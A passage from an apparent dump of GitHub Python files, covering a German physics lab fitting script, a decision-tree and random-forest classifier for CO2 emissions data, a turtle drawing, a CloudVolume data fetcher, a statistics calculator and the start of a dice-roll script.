Messwerte\")\nplt.text(0.35, 0.35, f\"$b = {exptau:.1uS}$ 1/s\", c=\"r\", transform=plt.gca().transAxes, va=\"top\")\nplt.xlabel(\"Zeit [s]\")\nplt.ylabel(\"Spannung [V]\")\nplt.xlim(1.3, 1.8)\nplt.ylim(-0.1, 
3.1)\nplt.legend()\nplt.tight_layout()\n# plt.savefig(\"Graphics/Versuch7_1.pdf\", transparent=True)\nplt.show()\n\n# %%\n# plot data with y axis as log scale\nplt.scatter(df.t, df.V, s=5, c=\"k\", label=\"Messwerte\")\nplt.plot(df.t, exp(df.t-df[\"t\"][start], *popt), \"r-\", label=\"Fit\")\nplt.scatter(df.t[points], df[\"V\"][points], color=\"red\", label=\"Ausgewählte Messwerte\")\n# plt.text(0.35, 0.35, f\"$b = {unc.ufloat(popt[1], perr[1]):.1uS}$ \", c=\"r\", transform=plt.gca().transAxes, va=\"top\")\nplt.xlabel(\"Zeit [s]\")\nplt.ylabel(\"Spannung [V]\")\nplt.xlim(1.3, 2.3)\n# plt.ylim(-0.1, 3.1)\nplt.yscale(\"log\", base=2)\n# plt.legend()\nplt.tight_layout()\nplt.show()\n\n# %%\n# load data\ndf = pd.read_csv(\"data/Versuch7_2.csv\")\n# rename columns\ndf.columns = [\"t\", \"V1\", \"V2\"]\ndf[\"Verr\"] = std\nrate = get_polling_rate(df)\n\n# plot data\n# plt.plot(df.t, df.V1, label=\"V1\")\n# plt.plot(df.t, df.V2, label=\"V2\")\n# plt.ylim(-0.1, 3.1)\n# plt.show()\n# %%\ndef fold_data(df, period):\n \"\"\"\n Fold the data at a given period and normalize the time to [0, 1].\n \"\"\"\n tempdf = df.copy()\n tempdf[\"phase\"] = np.fmod(tempdf[\"t\"], period) / period\n return tempdf\ndef shift_phase(df, shift=None, col=None, mode=\"min\"):\n \"\"\"\n Shift the phase by a given amount.\n If no amount is given, shift so that the peak is in the middle.\n \"\"\"\n if col is None:\n RuntimeError(\"No column given.\")\n tempdf = df.copy()\n if shift is None:\n tempdf2 = tempdf.copy()\n # \"bin\" the phase by rounding\n tempdf2[\"phase\"] = np.round(tempdf2[\"phase\"], 3)\n mean = tempdf2[col].mean()\n # only look at data below mean\n if mode == \"min\":\n binnedmax = tempdf2[\"phase\"][tempdf2[col] < mean].value_counts(sort=True)\n # peaklocation is the mean of the phases with the highest count\n peakloc = np.mean(binnedmax[binnedmax == binnedmax.max()].index)\n tempdf[\"phase\"] = np.fmod(tempdf[\"phase\"] - peakloc + 0.5, 1)\n elif mode == \"max\":\n binnedmin = tempdf2[\"phase\"][tempdf2[col] > mean].value_counts(sort=True)\n # peaklocation is the mean of the phases with the highest count\n peakloc = np.mean(binnedmin[binnedmin == binnedmin.max()].index)\n tempdf[\"phase\"] = np.fmod(tempdf[\"phase\"] - peakloc/2 + 0.5, 1)\n else:\n tempdf[\"phase\"] = np.fmod(tempdf[\"phase\"] + shift, 1)\n return tempdf\ndef sine(x, a, b, c):\n return a * np.sin(b * x + c)\ndef sine_fit(x, y, err=None, min=0, p0=None, verbose=False):\n if err is None:\n err = pd.Series(np.ones(len(x)))\n if p0 is None:\n p0 = [1000, 1100]\n start, end = p0[0], p0[1]\n popt, pcov = curve_fit(sine, x.iloc[start:end], y.iloc[start:end], sigma=err.iloc[start:end], absolute_sigma=True, p0=[0.2, 2, 0.5])\n chi = chisq(sine(x.iloc[start:end], *popt), y.iloc[start:end], dof=len(x.iloc[start:end]) - 4)\n if verbose:\n print(f\"start: {start}, end: {end}, chi: {chi}\")\n # increase start and end by 100 as long as chi is smaller than 1\n while chi < 1:\n end += len(x)//30\n if start > min:\n start -= 100\n try:\n popt, pcov = curve_fit(sine, x.iloc[start:end], y.iloc[start:end], sigma=err.iloc[start:end], absolute_sigma=True, p0=[popt[0], popt[1], popt[2]])\n except RuntimeError:\n print(\"RuntimeError\")\n break\n if end > 4*len(x)/5:\n if verbose:\n print(\"end too large\")\n break\n chi = chisq(sine(x.iloc[start:end], *popt), y.iloc[start:end], dof=len(x.iloc[start:end]) - 4)\n if verbose:\n print(f\"start: {start}, end: {end}, chi: {chi}\")\n end -= len(x)//30\n start += 100\n popt, pcov = curve_fit(sine, x.iloc[start:end], 
y.iloc[start:end], sigma=err.iloc[start:end], absolute_sigma=True, p0=[popt[0], popt[1], popt[2]])\n return popt, pcov\n\ndAmp, dphase = unp.uarray(np.zeros(5), np.zeros(5)), unp.uarray(np.zeros(5), np.zeros(5))\nfor (i, start, freq, shift) in zip([0, 1, 2, 3, 4], [0, 5.5, 11.5, 17.5, 23.5], [1, 3, 7, 10, 20], [0.3, 0.6, 0.7, 0.3, 0.3]):\n df2 = fold_data(df[int(start*rate):int((start+2.5)*rate)], 1/freq)\n df2 = shift_phase(df2, col=\"V2\", shift=shift)\n df2 = df2.sort_values(by=\"phase\")\n df2 = df2.reset_index(drop=True)\n\n # popt1, pcov1 = curve_fit(sine, df2[\"phase\"][df2[\"V1\"] > 0.01], df2[\"V1\"][df2[\"V1\"] > 0.01], p0=[0.2, 2, 0.5])\n # popt2, pcov2 = curve_fit(sine, df2[\"phase\"][df2[\"V2\"] > 0.01], df2[\"V2\"][df2[\"V2\"] > 0.01], p0=[0.2, 2, 0.5])\n popt1, pcov1 = sine_fit(df2[\"phase\"][df2[\"V1\"] > 0.01], df2[\"V1\"][df2[\"V1\"] > 0.01], err=2*df2[\"Verr\"][df2[\"V1\"] > 0.01], p0=[400, 500])\n popt2, pcov2 = sine_fit(df2[\"phase\"][df2[\"V2\"] > 0.01], df2[\"V2\"][df2[\"V2\"] > 0.01], err=2*df2[\"Verr\"][df2[\"V1\"] > 0.01], p0=[400, 500])\n perr1, perr2 = np.sqrt(np.diag(pcov1)), np.sqrt(np.diag(pcov2))\n A1, w1, phi1 = unc.ufloat(popt1[0], perr1[0]), unc.ufloat(popt1[1], perr1[1]), unc.ufloat(popt1[2], perr1[2])\n A2, w2, phi2 = unc.ufloat(popt2[0], perr2[0]), unc.ufloat(popt2[1], perr2[1]), unc.ufloat(popt2[2], perr2[2])\n # print(perr1, popt2)\n\n\n dA = A2/A1\n dPhi = phi2 - phi1\n dAmp[i] = dA\n dphase[i] = dPhi\n max1, max2 = (np.pi/2 - phi1)/w1, (np.pi/2 - phi2)/w2\n print(f\"dAmplitude: {dA:.2uS}, dPhase: {dPhi:.2uS}\")\n\n if i == 2:\n x1 = np.linspace((-popt1[2]-np.arcsin(0.05/popt1[0]))/popt1[1], (np.pi-popt1[2]+np.arcsin(0.05/popt1[0]))/popt1[1], 100)\n x2 = np.linspace((-popt2[2]-np.arcsin(0.05/popt2[0]))/popt2[1], (np.pi-popt2[2]+np.arcsin(0.05/popt2[0]))/popt2[1], 100)\n fig = plt.figure(figsize=(8, 2.88))\n plt.scatter(df2.phase, df2.V2, s=3, label=\"Messdaten U1\", alpha=0.5, zorder=0)\n plt.scatter(df2.phase, df2.V1, s=3, label=\"Messdaten U2\", alpha=0.5, zorder=0)\n plt.hlines(A1.n, 0, 1, color=\"black\", linestyle=\"dashed\", zorder=1)\n plt.hlines(A2.n, 0, 1, color=\"black\", linestyle=\"dashed\", zorder=1)\n # place text between the two lines\n plt.text(0.15, (A1.n + A2.n)/2, fr\"$A1/A2 = {dA:.1uS}$\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.vlines(max1.n, 0, 0.2, color=\"black\", linestyle=\"dashed\", zorder=1)\n plt.vlines(max2.n, 0, 0.2, color=\"black\", linestyle=\"dashed\", zorder=1)\n # place text between the two lines\n plt.text((max1.n + max2.n)/2, -0.05, fr\"$\\Delta \\phi = {dPhi/(2*np.pi):.1uS}\\cdot 2\\pi = {dPhi:.1uS}$\", horizontalalignment=\"center\", verticalalignment=\"center\")\n # plt.scatter(df2[\"phase\"][df2[\"V1\"] > 0.1], df2[\"V1\"][df2[\"V1\"] > 0.1], c=\"r\")\n plt.plot(x2, sine(x2, *popt2), label=\"Fit U1\", zorder=0)\n plt.plot(x1, sine(x1, *popt1), label=\"Fit U2\", zorder=0)\n plt.xlabel(\"Phase (f = 7 Hz)\")\n plt.ylabel(\"Spannung [V]\")\n plt.ylim(-0.18, 0.18)\n plt.xlim(0, 1)\n plt.legend(ncol=4, loc=\"lower center\", handlelength=1, markerscale=3, borderaxespad=0.4)\n plt.tight_layout()\n plt.savefig(\"Graphics/Versuch7_2.pdf\", transparent=True)\n plt.show()\n\nfor i in range(4):\n print(f\"{dAmp[i]:.1uS}\", end=\" & \")\nprint(f\"{dAmp[4]:.2uS} \\\\\\\\\")\nfor i in range(4):\n print(f\"{dphase[i]:.2uS}\", end=\" & \")\nprint(f\"{dphase[4]:.1uS} \\\\\\\\\")\n# %%\nfreq = np.array([1, 3, 7, 10, 20])\nwfreq = 2*np.pi*freq\ndAmp = unp.sqrt(dAmp**2-1)/wfreq\ndphase = 
unp.tan(dphase)/wfreq\n\nfor i in range(4):\n print(f\"{dAmp[i]:.2uS}\", end=\" & \")\nprint(f\"{dAmp[4]:.2uS} \\\\\\\\\")\nfor i in range(4):\n print(f\"{dphase[i]:.2uS}\", end=\" & \")\nprint(f\"{dphase[4]:.1uS} \\\\\\\\\")\n# %%\n# fit const to data\npopt1, pcov1 = curve_fit(const, freq, unp.nominal_values(dAmp), sigma=unp.std_devs(dAmp), absolute_sigma=False)\npopt2, pcov2 = curve_fit(const, freq, unp.nominal_values(dphase), sigma=unp.std_devs(dphase), absolute_sigma=True)\nperr1, perr2 = np.sqrt(np.diag(pcov1)), np.sqrt(np.diag(pcov2))\ntau1, tau2 = unc.ufloat(popt1[0], perr1[0]), unc.ufloat(popt2[0], perr2[0])\nprint(f\"tau1: {tau1:.1uS}, tau2: {tau2:.1uS}\")\n\n# plot dAmp and dphase vs frequency\nplt.errorbar(freq, unp.nominal_values(dAmp), yerr=unp.std_devs(dAmp), fmt=\".\", label=\"Amplitude\")\nplt.errorbar(freq, unp.nominal_values(dphase), yerr=unp.std_devs(dphase), fmt=\".\", label=\"Phase\")\nplt.hlines(popt1[0], 0, 20, color=\"black\", linestyle=\"dashed\")\nplt.fill_between(freq, tau1.n + tau1.s, tau1.n - tau1.s, alpha=0.5)\nplt.hlines(popt2[0], 0, 20, color=\"black\", linestyle=\"dashed\")\nplt.fill_between(freq, tau2.n + tau2.s, tau2.n - tau2.s, alpha=0.5)\nplt.xlabel(\"Frequenz [Hz]\")\nplt.ylabel(\"Spannung [V]\")\nplt.xticks(freq)\nplt.legend()\nplt.tight_layout()\n# plt.savefig()\nplt.show()\n\n# %%\nnewtau = (exptau + tau1 + tau2)/3\n\n# plot all values for tau as gaussian\nx = np.linspace(0.02, 0.03, 1000)\nplt.figure(figsize=(8, 2.5))\n\nplt.plot(x, norm.pdf(x, tau1.n, tau1.s), color=\"black\", label=\"Messdaten\")\nplt.plot(x, norm.pdf(x, tau2.n, tau2.s), color=\"black\")\nplt.plot(x, norm.pdf(x, exptau.n, exptau.s), color=\"black\")\nplt.plot(x, norm.pdf(x, newtau.n, newtau.s), color=\"red\", label=\"Fitwert\")\nplt.fill_between(x, norm.pdf(x, newtau.n, newtau.s), color=\"red\", alpha=0.2, where=(x > newtau.n - newtau.s) & (x < newtau.n + newtau.s), label=r\"$1\\sigma$ Band\")\nplt.vlines(newtau.n, 0, norm.pdf(newtau.n, newtau.n, newtau.s), color=\"red\", linestyle=\"dashed\")\n# label the gaussian\nplt.text(0.54, 0.85, fr\"$\\tau_A$\", transform=plt.gca().transAxes)\nplt.text(0.75, 0.25, fr\"$\\tau_{{\\phi}}$\", transform=plt.gca().transAxes)\nplt.text(0.22, 0.25, fr\"$\\tau_{{cap}}$\", transform=plt.gca().transAxes)\n\nplt.xlabel(r\"$\\tau$ [1/s]\")\nplt.ylabel(r\"Wahrscheinlichkeitsdichte\")\nplt.xlim(0.022, 0.0255)\nplt.legend()\nplt.tight_layout()\nplt.savefig(\"Graphics/Versuch7_6.pdf\", transparent=True)\nplt.show()\n\n\nprint(f\"tau1: {tau1:.1uS}, tau2: {tau2:.1uS}, exptau: {exptau:.1uS}, newtau: {newtau:.1uS}\")\nC = newtau/R\nprint(f\"C: {C:.1uS} \")\n# %%\n# load data\ndf = pd.read_csv(\"data/Versuch7_3.csv\")\n# rename columns\ndf.columns = [\"t\", \"V\"]\ndf[\"Verr\"] = std\nrate = get_polling_rate(df)\n\n# cmap = colors.LinearSegmentedColormap('custom', cdict)\ncmap = sns.color_palette(\"rocket\", as_cmap=True)\n\n# go through 50 data points at a time and write min and max to new dataframe\nmaxdf = pd.DataFrame(columns=[\"t\", \"V\", \"Verr\"])\nfor i in range(0, len(df), 250):\n maxdf = maxdf.append(df.iloc[i:i+250].max(), ignore_index=True)\n\nrand = np.linspace(2.25*rate/250, 9*rate/250, 10, dtype=int)\n# rand = np.linspace(2.25*rate/250, 9*rate/250, 10, dtype=int)\n\nfig, (ax1, ax2) = plt.subplots(2, 1, figsize=(8, 4))\n\nfreqarr = np.empty(len(rand))\n# calculate frequency for rand\nfor i, r in enumerate(rand*250):\n # compute fft, sample rate is 2400 Hz\n yf = ifft(df[\"V\"][r - 208:r + 208].to_numpy())\n # get frequencie of max value\n yf[0] 
= 0\n freq = fftfreq(len(yf), 1 / rate)[np.argmax(np.abs(yf))]\n freqarr[i] = freq\n # print(f\"Frequency: {freq:.2f} Hz\")\n\n xf = fftfreq(len(yf), 1 / rate)\n ax2.plot(xf, np.abs(yf), c=cmap(i / (len(rand))))\n ax1.axvline(df[\"t\"][r+250], 0, 1.2, linestyle=\"--\", c=cmap(i / (len(rand))))\n ax2.text(freq-20, 0.01+np.abs(yf)[np.argmax(np.abs(yf))], f\"{freq:.0f} Hz\", c=cmap(i / (len(rand))))\n\nax2.set_ylim(0, 0.35)\nax2.set_xlabel(\"Frequenz [Hz]\")\nax2.set_ylabel(\"Amplitude [V]\")\n# plot data\nax1.scatter(df.t[::5], df.V[::5], s=3)\nax1.scatter(maxdf.t, maxdf.V, s=3)\nax1.scatter(maxdf.t[rand], maxdf.V[rand], s=15, c=\"r\")\nax1.set_xlabel(\"Zeit [s]\")\nax1.set_ylabel(\"Spannung [V]\")\nax1.set_xlim(0.5, 11)\nax2.set_xlim(50, 550)\nplt.tight_layout()\n# plt.savefig(\"Graphics/Versuch7_3.pdf\", transparent=True)\nplt.show()\n\n# %%\nR2 = unc.ufloat(10, 0.5)\n# lorentzian fit\ndef lorentzian(x, A, x0, gamma):\n return A / np.pi * gamma / ((x - x0)**2 + gamma**2)\n\n# def gauss(x, A, x0, sigma):\n# return A * np.exp(-(x - x0)**2 / (2 * sigma**2))\n\n# fit lorentzian to data\npopt, pcov = curve_fit(lorentzian, freqarr, unp.nominal_values(maxdf.V[rand])**2/(2*R2.n), p0=[0.1, 300, 1])\nperr = np.sqrt(np.diag(pcov))\n# popt2, pcov2 = curve_fit(gauss, freqarr, unp.nominal_values(maxdf.V[rand]), p0=[1, 300, 10])\n\n# plot amplitude vs frequency\nfig = plt.figure(figsize=(8, 3))\nplt.errorbar(freqarr, unp.nominal_values(maxdf.V[rand])**2/(2*R2.n), yerr=unp.std_devs(maxdf.V[rand])**2/(2*R2.n), fmt=\".k\", label=\"Messdaten\")\nplt.plot(np.linspace(0, 600, 100), lorentzian(np.linspace(0, 600, 100), *popt), label=\"Fit\", c=\"r\")\n# plot peak and fhwd as points\n# plt.scatter(popt[1], lorentzian(popt[1], *popt), label=\"Peak\")\n# plt.scatter(popt[1] + popt[2], lorentzian(popt[1] + popt[2], *popt), label=\"FHWD\")\n# plt.plot(np.linspace(0, 500, 100), gauss(np.linspace(0, 500, 100), *popt2), label=\"Fit\")\nplt.text(0.1, 0.8, fr\"$x_{{0}} = {unc.ufloat(popt[1], perr[1]):.1uS}$ Hz\", transform=plt.gca().transAxes)\nplt.text(0.8, 0.8, fr\"$\\gamma = {unc.ufloat(popt[2], perr[2]):.1uS}$ Hz\", transform=plt.gca().transAxes)\nplt.xlabel(\"Frequenz [Hz]\")\nplt.ylabel(\"Leistung [W]\")\nplt.xlim(0, 600)\nplt.legend(loc=\"lower center\")\nplt.tight_layout()\n# plt.savefig(\"Graphics/Versuch7_4.pdf\", transparent=True)\nplt.show()\n# %%\ndef oscillator(f, X0, f0, gamma):\n return X0 / (np.sqrt((1 - (f / f0)**2)**2 + gamma**2 * (f / f0)**2))\n\n# plot lorentzian with w/w_0 as x axis and amplitude/popt[0] as y axis\npopt1, pcov1 = curve_fit(oscillator, freqarr/popt[1], unp.nominal_values(maxdf.V[rand]), p0=[1, 1, 1])\nperr1 = np.sqrt(np.diag(pcov1))\n\nfig = plt.figure(figsize=(8, 3))\nplt.errorbar(freqarr / popt[1], unp.nominal_values(maxdf.V[rand])/popt1[0], yerr=unp.std_devs(maxdf.V[rand])/popt1[0], fmt=\".\", label=\"Amplitude\")\nplt.plot(np.linspace(0, 2, 100), oscillator(np.linspace(0, 2, 100), *popt1)/popt1[0], label=\"Fit\")\nplt.xlabel(\"Frequenz / Resonanzfrequenz\")\nplt.ylabel(\"Spannung [V]\")\nplt.legend()\nplt.tight_layout()\n# plt.savefig(\"Graphics/Versuch7_5.pdf\", transparent=True)\nplt.show()\n\n# %%\nL = 100e-3\nR2 = unc.ufloat(10, 0.5)\n# C = 2.2e-6\n\nfres = 1 / (2 * np.pi * unp.sqrt(L * C))\nQ = 1/R2 * unp.sqrt(L/C)\nprint(\"expected:\")\nprint(f\"fres: {fres:.1uS} Hz, Q: {Q:.2uS}\")\npeak = unc.ufloat(popt[1], perr[1])\nfhwd = 2*unc.ufloat(popt[2], perr[2])\n# Ppeak = lorentzian(peak, *popt)**2/(2*R2)\n# Pfhwd = lorentzian(peak+fhwd, *popt)**2/(2*R2)\nQ = peak / 
fhwd\nprint(\"measured:\")\nprint(f\"fres: {peak:.1uS} Hz, Q: {Q:.1uS}\")\n\nLexp = 1 / ((2 * np.pi * peak)**2 * C)\nprint(f\"L: {Lexp:.2uS}\")\n\nRexp = 1/Q * unp.sqrt(L/C)\nprint(f\"R: {Rexp:.1uS}, Rmissing: {Rexp-R2:.1uS}\")\n","repo_name":"alexanderhelbok/Grundpraktikum","sub_path":"Versuch7.py","file_name":"Versuch7.py","file_ext":"py","file_size_in_byte":16182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31626890762","text":"import pandas as pd\nimport sklearn.tree as tree\nimport sklearn.metrics as metric\nimport sklearn.ensemble as ense\nimport graphviz\n\n# Load dataset\ndata = pd.read_csv(\"CO2 Emissions_Canada.csv\")\n\n# Factorize categorical variables\ndata[\"Make\"], _ = pd.factorize(data[\"Make\"])\ndata[\"Model\"], _ = pd.factorize(data[\"Model\"])\ndata[\"Vehicle Class\"], _ = pd.factorize(data[\"Vehicle Class\"])\ndata[\"Transmission\"], _ = pd.factorize(data[\"Transmission\"])\ndata[\"Fuel Type\"], fuel_names = pd.factorize(data[\"Fuel Type\"])\n\n# Split data into train and test sets\npartition = int(len(data) * 0.7) # 70% partition\ntrain_data, test_data = data[:partition].drop(columns=\"Fuel Type\"), data[partition:].drop(columns=\"Fuel Type\")\ntrain_class, test_class = data[:partition][\"Fuel Type\"], data[partition:][\"Fuel Type\"]\n\n# Display fuel type name mapping\nprint(\"Fuel type name mapping:\", fuel_names.values)\n\n# Define error metric functions\ndef mae(true, pred):\n return ((true - pred).abs()).sum() / len(true)\n\n# Define function to display accuracy metrics\ndef display_accuracy(name, true, pred):\n print(\"_________\", name, \"_________\")\n mse = ((true - pred) ** 2).sum() / len(true)\n print(\"MSE:\", mse)\n print(\"MAE:\", mae(true, pred))\n print(\"RMSE:\", mse ** 0.5)\n print(\"Confusion matrix:\")\n matrix = metric.confusion_matrix(true, pred)\n print(matrix)\n print(\"Accuracy for each class:\")\n print(matrix.diagonal() / matrix.sum(axis=1) * 100)\n\n# Build and render decision tree model\ntree_clf = tree.DecisionTreeClassifier(criterion=\"gini\", splitter=\"best\")\ntree_model = tree_clf.fit(train_data, train_class)\ndot_data = tree.export_graphviz(tree_model, out_file=None, feature_names=train_data.columns, class_names=fuel_names, filled=True, rounded=True, special_characters=True)\ngraph = graphviz.Source(dot_data)\ngraph.render(\"tree\")\ndisplay_accuracy(\"Decision Tree (depth=inf)\", test_class, tree_model.predict(test_data))\n\nprint(\"help this is the ending of my lifeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee\")\n\nfor depth in [4, 7, 10, 12]:\n tree_clf = tree.DecisionTreeClassifier(criterion=\"gini\", splitter=\"best\", max_depth=depth)\n tree_model = tree_clf.fit(train_data, train_class)\n display_accuracy(f\"Decision Tree (depth={depth})\", test_class, tree_model.predict(test_data))\n\n\n# Build forest models with n_estimators = 5 and max_depth values ranging from 1 to 12\nmae_min = test_class.max()\ntree_min = 0\nfor i in range(1, 12):\n tree_clf = ense.RandomForestClassifier(n_estimators = 5, max_depth = i)\n tree_model = tree_clf.fit(train_data, train_class)\n MAE = mae(test_class, tree_model.predict(test_data))\n if (MAE < mae_min):\n mae_min = MAE\n tree_min = i\n model_min = tree_model\n\nprint(\"random_forest_best_depth:\", tree_min)\ndisplay_accuracy(\"random_forest_best_depth\", test_class, model_min.predict(test_data))\n\n\n# Build forest models with n_estimators = 3:9 and max_depth value 11\nmae_min = test_class.max()\nfor forest_size in range(3, 9):\n 
tree_clf = ense.RandomForestClassifier(n_estimators = forest_size, max_depth = 11)\n tree_model = tree_clf.fit(train_data, train_class)\n\n MAE = mae(test_class, tree_model.predict(test_data))\n if (MAE < mae_min):\n mae_min = MAE\n size_min = forest_size\n model_min = tree_model\n\nprint(\"random_forest_best_size:\", size_min)\ndisplay_accuracy(\"random_forest_best_size\", test_class, model_min.predict(test_data))\n","repo_name":"hiropoofs/Data_Science_Decision_Trees","sub_path":"pythonProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39169448864","text":"import turtle\r\nimport random\r\n\r\ndef sky(stars,south,north,east,west):\r\n\tturtle.up()\r\n\t\r\n\tturtle.home()\t\t\t\t\t#black backdrop\r\n\tturtle.down()\r\n\tturtle.pencolor(\"black\")\r\n\tturtle.fillcolor(\"black\")\r\n\tturtle.begin_fill()\r\n\tturtle.setheading(north)\r\n\tturtle.forward(250)\r\n\tturtle.right(90)\r\n\tturtle.forward(190)\r\n\tturtle.right(90)\r\n\tturtle.forward(250)\r\n\tturtle.right(190)\r\n\tturtle.end_fill()\r\n\t\r\n\tfor i in range(stars): \t\t\t#star generator\r\n\t\tturtle.up()\r\n\t\tturtle.pencolor(\"white\")\r\n\t\tturtle.fillcolor(\"white\")\r\n\t\tx = random.randint(0,190)\r\n\t\ty = random.randint(0,250)\r\n\t\tturtle.setpos(x,y)\r\n\t\tturtle.down()\r\n\t\tturtle.begin_fill()\r\n\t\tturtle.circle(0.5)\r\n\t\tturtle.end_fill()\r\n\t\tturtle.up()","repo_name":"unown294/Python-UTA-","sub_path":"Homework_2_Redman/stars.py","file_name":"stars.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42139160509","text":"import cloudvolume\n# import daisy\nimport json\nimport logging\nimport numpy as np\nimport os\nimport sys\n\nlogging.basicConfig(level=logging.INFO)\n\ndef world_to_vox(offset,voxel_size):\n\n return [int(i/j) for i,j in zip(offset, voxel_size)]\n\ndef cloud_to_zarr_coords(coords, voxel_size):\n\n return [int(i*j) for i,j in zip(coords, voxel_size)][::-1]\n\ndef fetch_in_block(\n block,\n voxel_size,\n raw_data,\n out_ds):\n\n logging.info('Fetching raw in block %s' %block.read_roi)\n\n voxel_size = list(voxel_size)\n\n block_start = list(block.write_roi.get_begin())\n block_end = list(block.write_roi.get_end())\n\n block_start = world_to_vox(block_start,voxel_size)\n block_end = world_to_vox(block_end,voxel_size)\n\n z_start, z_end = block_start[0], block_end[0]\n y_start, y_end = block_start[1], block_end[1]\n x_start, x_end = block_start[2], block_end[2]\n\n raw = raw_data[x_start:x_end, y_start:y_end, z_start:z_end]\n\n raw = np.array(np.transpose(raw))\n\n raw = raw[2:3]\n\n raw = raw >= 128\n\n raw = raw[0]\n\n out_ds[block.write_roi] = raw\n\ndef get_cloud_roi(cloud_vol):\n\n info = cloud_vol.info\n\n roi_offset = info.voxel_offset\n roi_shape = info['scales'][0].size\n\n return roi_offset, roi_shape\n\ndef fetch(\n in_vol,\n voxel_size,\n roi_offset,\n roi_shape,\n out_file,\n out_ds,\n num_workers):\n\n # raw_vol = cloudvolume.CloudVolume(\n # in_vol,\n # bounded=True,\n # progress=True)\n\n # info = raw_vol.info\n\n # for scale in info['scales']:\n # if not scale['voxel_offset']:\n # scale['voxel_offset'] = [0,0,0]\n\n # raw_vol.info = info\n\n total_roi = daisy.Roi((roi_offset), (roi_shape))\n\n read_roi = daisy.Roi((0, 0, 0), (5040, 5040, 5040))\n write_roi = read_roi\n\n logging.info('Creating out dataset...')\n\n raw_out = 
daisy.prepare_ds(\n out_file,\n out_ds,\n total_roi,\n voxel_size,\n dtype=np.uint8,\n write_roi=write_roi)\n\n logging.info('Writing to dataset...')\n\n daisy.run_blockwise(\n total_roi,\n read_roi,\n write_roi,\n process_function=lambda b: fetch_in_block(\n b,\n voxel_size,\n in_vol,\n raw_out),\n fit='shrink',\n num_workers=num_workers)\n\nif __name__ == '__main__':\n\n # in_vol = \"https://storage.googleapis.com/j0126-nature-methods-data/GgwKmcKgrcoNxJccKuGIzRnQqfit9hnfK1ctZzNbnuU/rawdata_realigned\"\n\n # in_vol = \"https://storage.googleapis.com/j0126-nature-methods-data/GgwKmcKgrcoNxJccKuGIzRnQqfit9hnfK1ctZzNbnuU/ffn_segmentation\"\n\n in_vol =\"https://storage.googleapis.com/j0126-nature-methods-data/GgwKmcKgrcoNxJccKuGIzRnQqfit9hnfK1ctZzNbnuU/tissue_classification\"\n\n raw_vol = cloudvolume.CloudVolume(\n in_vol,\n bounded=True,\n progress=True,\n fill_missing=True)\n\n info = raw_vol.info\n\n # print(info)\n\n for scale in info['scales']:\n scale['voxel_offset'] = [0, 0, 0]\n\n raw_vol.info = info\n\n print(raw_vol.info)\n\n size = raw_vol.info['scales'][0]['size'][::-1]\n print(size)\n\n # voxel_size = daisy.Coordinate((20,18,18))\n # roi_offset = [0, 0, 0]\n # roi_shape = [114000, 97920, 95616]\n # roi_shape = [i*j for i,j in zip(size, [20,18,18])]\n # roi_shape = [10000, 9990, 9990]\n\n # print(roi_shape)\n\n # out_file = sys.argv[1]\n # out_ds = 'volumes/ffn_cell_body_mask'\n\n # fetch(\n # raw_vol,\n # voxel_size,\n # roi_offset,\n # roi_shape,\n # out_file,\n # out_ds,\n # num_workers=32)\n\n","repo_name":"funkelab/lsd_experiments","sub_path":"scripts/data_consolidation/cloud_to_zarr_mask.py","file_name":"cloud_to_zarr_mask.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41332633951","text":"import numpy as np\n\n\ndef calculate(list):\n if len(list) != 9:\n raise ValueError(\"List must contain nine numbers.\")\n else:\n\n array = np.array(list).reshape(3, 3)\n calculations = {\n name: [fun(array, axis=x).tolist()\n for x in [0, 1, None]]\n for (name, fun)\n in zip(['mean', 'variance', 'standard deviation', 'max', 'min', 'sum'],\n [np.mean, np.var, np.std, np.max, np.min, np.sum])\n }\n return calculations\n","repo_name":"LuisTorres1304/FreeCodeCamp_Data_Analysis_with_Python","sub_path":"Mean-Variance-Standard Deviation Calculator/mean_var_std.py","file_name":"mean_var_std.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45115545986","text":"# Author: Emsii \r\n# Date: 13.12.2022 \r\n# https://github.com/EmsiiDiss\r\n\r\nimport random\r\nfrom datetime import datetime\r\n\r\nodstep = \" \" *8\r\nmin_val = 1\r\nmax_val = 6\r\n\r\ndef reset():\r\n global ilosc, liczba_1, liczba_2, liczba_3, liczba_4, liczba_5, liczba_6, kostka_sr, min_val, max_val, odstep, ile_razy \r\n liczba_1 = 0\r\n liczba_2 = 0 \r\n liczba_3 = 0 \r\n liczba_4 = 0 \r\n liczba_5 = 0\r\n liczba_6 = 0\r\n kostka_sr = 0\r\n ilosc = 0 \r\n ile_razy = 1\r\n\r\ndef liczba_roli():\r\n try:\r\n ile_razy = int(input(odstep + \"Ile razy chcesz rolować?\\n\"))\r\n except ValueError: \r\n ile_razy = 1\r\n baza(ile_razy)\r\n\r\ndef statystyki(statystyka, kostka, start):\r\n global ilosc, liczba_1, liczba_2, liczba_3, liczba_4, liczba_5, liczba_6, kostka_sr\r\n\r\n kostka_sr = (kostka_sr + kostka)\r\n if statystyka == 1 or statystyka == 2: \r\n if kostka == 1:\r\n liczba_1 = liczba_1 + 1\r\n elif kostka == 
